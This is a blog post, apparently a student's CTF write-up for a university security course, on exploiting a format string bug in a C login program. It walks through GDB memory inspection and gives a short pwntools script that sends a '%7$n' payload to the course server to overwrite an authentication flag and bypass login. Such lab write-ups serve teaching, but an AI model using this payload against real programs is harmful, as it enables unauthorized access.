<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="Yugeng Liu">





<title>Authorization is Key | 叫我胖更好了</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


    <script async defer src="https://buttons.github.io/buttons.js"></script>
<meta name="generator" content="Hexo 5.3.0"></head>
<body>
    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/"><img src="/image/yinzhang.png" width="30"/></a> </div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Archives</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                    <a class="menu-item" href="/publications">Publications</a>
                
                    <a class="menu-item" href="/misc">Misc.</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>

        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">叫我胖更好了</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Archives</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                    <a class="menu-item" href="/publications">Publications</a>
                
                    <a class="menu-item" href="/misc">Misc.</a>
                
            </div>
        </div>
    </nav>

    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-130596599-2"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());

        gtag('config', 'UA-130596599-2');
    </script>


</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
        <div class="main">
            <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    document.ready(
        function () {
            tocbot.init({
                tocSelector: '.tocbot-list',
                contentSelector: '.post-content',
                headingSelector: 'h1, h2, h3, h4, h5',
                collapseDepth: 1,
                orderedList: false,
                scrollSmooth: true,
            })
        }
    )

    function expand_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 6,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "collapse_toc()");
        b.innerHTML = "Collapse all"
    }

    function collapse_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 1,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "expand_toc()");
        b.innerHTML = "Expand all"
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">Authorization is Key</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">Yugeng Liu</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">December 1, 2019&nbsp;&nbsp;12:24:14</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/category/CTF/">CTF</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <p>This is a CTF problem on Format String Attacks. The question is on the <a target="_blank" rel="noopener" href="https://sec19.scy-phy.net/tasks/Authorization%20is%20Key">CTF Platform</a> of the Security Lecture at Saarland University. Maybe you can&#39;t log in the website. The description is in the following:</p>
<p>Your colleague has implemented a new login functionality and pushed his commit to master, hence making it productive, without checking for open ToDos. Unfortunately, he forgot to implement the function responsible for checking login credentials. Furthermore, he can not change the running state of the system without accessing the server secret, which changes hourly and is protected by the unimplemented login.</p>
<p>The two files are here:<br><a href="/files/authorization_is_key">authorization_is_key</a><br><a href="/files/authorization_is_key.c">authorization_is_key.c</a></p>
<h3 id="analysis">Analysis</h3>

<p>the vulnerable part here is &#39;printf(username);&#39; in the source code. This means we can use format string attack here because it just has one parameter. My solution is in the following:</p>
<p>we need to know where is the location of the <em>is_authenticated</em> in the memory. After using <em>GDB_peda</em> to check the memory, I found there was a parameter strange because it was <em>0x300000000</em><br><img src="/image/Authorization_is_Key/1.png"></p>
<p>and after one loop it became <em>0x200000000</em>.<br><img src="/image/Authorization_is_Key/2.png"></p>
<p>I know 3 and 2 must equal to the number of <em>attempts</em>. But what the zeros mean is confused. After thinking about that, I used <em>x/20gx $rsp</em> command to enter the memory, and I found the whole memory is <em>0x0000000200000000</em>.<br><img src="/image/Authorization_is_Key/3.png"></p>
<p>So, I understood that the first 8 bytes were used for storing <em>attempts</em> and the last 8 bytes were used for storing <em>is_authenticated</em>. Also, I found that value in the next address was <em>0x00007fffffffde20</em> which is the address of <em>is_authenticated</em>. It is the pointer parameter <em>is_authenticated_ptr</em>. So, we can change the pointer&#39;s value to change the value of <em>is_authenticated</em>.</p>
<h3 id="experiment">Experiment</h3>

<p>After knowing this, I used the bug of &#39;printf(username);&#39; to change the value. The first thing here is to know the offset in the memory. After testing on GDB, I found the offset of <em>is_authenticated_ptr</em> is 7. So, we can write a shellcode right now.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">conn = remote(<span class="string">&#x27;sec19.scy-phy.net&#x27;</span>,<span class="number">1339</span>)</span><br><span class="line">r1 = conn.recvline()</span><br><span class="line"><span class="comment">#b&#x27;Username:\n&#x27;</span></span><br><span class="line">conn.sendline(<span class="string">&#x27;x%7$n&#x27;</span>)</span><br><span class="line">r2 = conn.recvline()</span><br><span class="line"><span class="comment">#b&#x27;Password:\n&#x27;</span></span><br><span class="line">conn.sendline(<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">r3 = conn.recvline()</span><br><span class="line"><span class="comment">#b&#x27;Checked credentials for user x.\n&#x27;</span></span><br><span class="line">r4 = conn.recvline()</span><br><span class="line"><span class="comment">#b&#x27;Welcome!\n&#x27;</span></span><br><span class="line">r5 = conn.recvline()</span><br><span class="line"><span class="built_in">print</span> (r5)</span><br><span class="line">conn.close()</span><br></pre></td></tr></table></figure>
<p>We can get the flag : FLAG{Who_implemented_this_fricking_percent_n_formatter}</p>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>Yugeng Liu</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="https://liu.ai/2019/12/01/Authorization%20is%20Key/">https://liu.ai/2019/12/01/Authorization%20is%20Key/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright &copy; <script> var date, year; date = new Date(); year = date.getFullYear(); document.write(year); </script> <a target="_blank" rel="noopener" href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/CTF/"><i class="iconfont icon-tags"></i> CTF</a>
                    
                        <a href="/tags/Format-String-Attacks/"><i class="iconfont icon-tags"></i> Format String Attacks</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2019/12/09/Paper%20Reading%20Essay%201/">Paper Reading Essay 1</a>
            
            
        </section>


    </article>
</div>

        </div>
        <footer id="footer" class="footer">
    <div class="copyright">
        <span>Copyright &copy; 
        <script>
	        var date, year;
	        date = new Date();
	        year = date.getFullYear();
	        document.write(year);
	    </script>
        Yugeng Liu | theme by <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>



        <!--script type="text/javascript" color="220,220,220" opacity='0.8' zIndex="-2" count="200" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script-->
    </div>
</body>
</html>
